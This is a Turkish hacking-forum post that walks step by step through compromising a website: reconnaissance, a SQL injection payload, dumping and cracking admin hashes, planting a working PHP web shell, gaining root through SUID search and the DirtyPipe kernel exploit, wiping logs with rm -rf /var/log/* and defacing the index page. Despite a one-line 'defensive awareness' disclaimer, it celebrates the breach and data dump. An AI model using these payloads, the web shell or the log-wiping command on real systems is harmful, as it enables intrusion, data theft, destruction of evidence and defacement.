Hoşgeldin Misafir

Bir Web Sitesi Nasıl Hacklenir ?(Detaylı Anlatım)

masterrt

masterrt

Sınırlar duvar değil, sadece öneridir
ROOT
14 Ara 2025
74 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
pc7vinj.png


OPERASYONEL ANALİZ: WEB PENETRASYON METODOLOJİSİ

"Sistemler uyur, ancak açıklar asla."



Merhaba değerli TURKHACKS ailesi. Ben MasterRT. Bugün, bir siber güvenlik uzmanının veya ileri düzey bir saldırganın, hedef bir altyapıyı nasıl analiz ettiğini, zafiyetleri nasıl manipüle ettiğini ve sistemin kalbine (Root) nasıl ulaştığını adım adım bir senaryo üzerinden teknik detaylarıyla ele alacağız.

DİKKAT: Bu dokümantasyon tamamen defansif siber güvenlik farkındalığı oluşturmak amacıyla hazırlanmıştır. Bilgi, doğru ellerde güç; yanlış ellerde ise sadece yıkımdır.

1. BÖLÜM: PASİF VE AKTİF BİLGİ TOPLAMA (INFO GATHERING)

Saldırı vektörünü belirlemeden önce hedefi dijital bir röntgenden geçiriyoruz.



  • []Subdomain Discovery: Subfinder ve Assetfinder ile ana domainin arkasında unutulmuş test sunucuları (https://www.google.com/search?q=staging.target.com) aranır.

    []Service Fingerprinting: nmap -sV -sC -Pn <target> komutuyla çalışan servislerin versiyonları tespit edilir.
  • Tech Stack Analysis: Hedefin backend mimarisi (PHP/Node.js), veritabanı tipi (PostgreSQL/MySQL) ve WAF (Cloudflare/Sucuri) durumu analiz edilir.

2. BÖLÜM: ZAFİYET VEKTÖRÜNÜN TESPİTİ

Yapılan taramalar sonucunda, hedef sitenin kullanıcı profil kısmında bir Stored XSS ve eklenti parametrelerinde Blind SQL Injection şüphesi doğuyor.



  • []Payload: ' UNION SELECT 1,2,3,database(),user() -- -

    []Analiz: SQLmap ile veritabanı tabloları dump edilerek admin hashleri (MD5/BCrypt) çekilir. Hashler offline olarak Hashcat veya John The Ripper ile kırılır.

3. BÖLÜM: SİSTEME INTRUSION VE WEB SHELL

Admin paneline erişim sağlandıktan sonra, "Plugin Editor" veya "Media Upload" kısımlarından sunucuya RCE (Remote Code Execution) tetikleyecek bir payload gönderilir.

PHP:
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; } ?>

Bu aşamada Hacker artık sistemin içindedir. whoami komutuyla yetki kontrol edilir: www-data.

4. BÖLÜM: PRIVILEGE ESCALATION (YETKİ YÜKSELTME)

Sunucuda tam hakimiyet kurmak için Local Privilege Escalation teknikleri uygulanır:



  • []SUID Bit Taraması: find / -perm -u=s -type f 2>/dev/null ile root yetkisiyle çalışan dosyalar bulunur.

    []Kernel Exploit: Linux çekirdeğindeki (DirtyPipe, CVE-2022-0847 vb.) açıklar üzerinden #root yetkisi alınır.

5. SONUÇ: FLAG VE INDEX

Yetki yükseltildikten sonra loglar temizlenir (rm -rf /var/log/*) ve sistemin kalbine, adaletin sesini duyuran o meşhur index dosyası bırakılır.

MISSION ACCOMPLISHED

Penetrasyon LideriMasterRT
Hedef AltyapıCompromised
Veri Sızıntısı%100 Dumped





MasterRT | TURKHACKS

"Biz sessizce derinlerde gezeriz, vaktimiz geldiğinde ise sadece enkazımızı bırakırız."
 
Son düzenleme: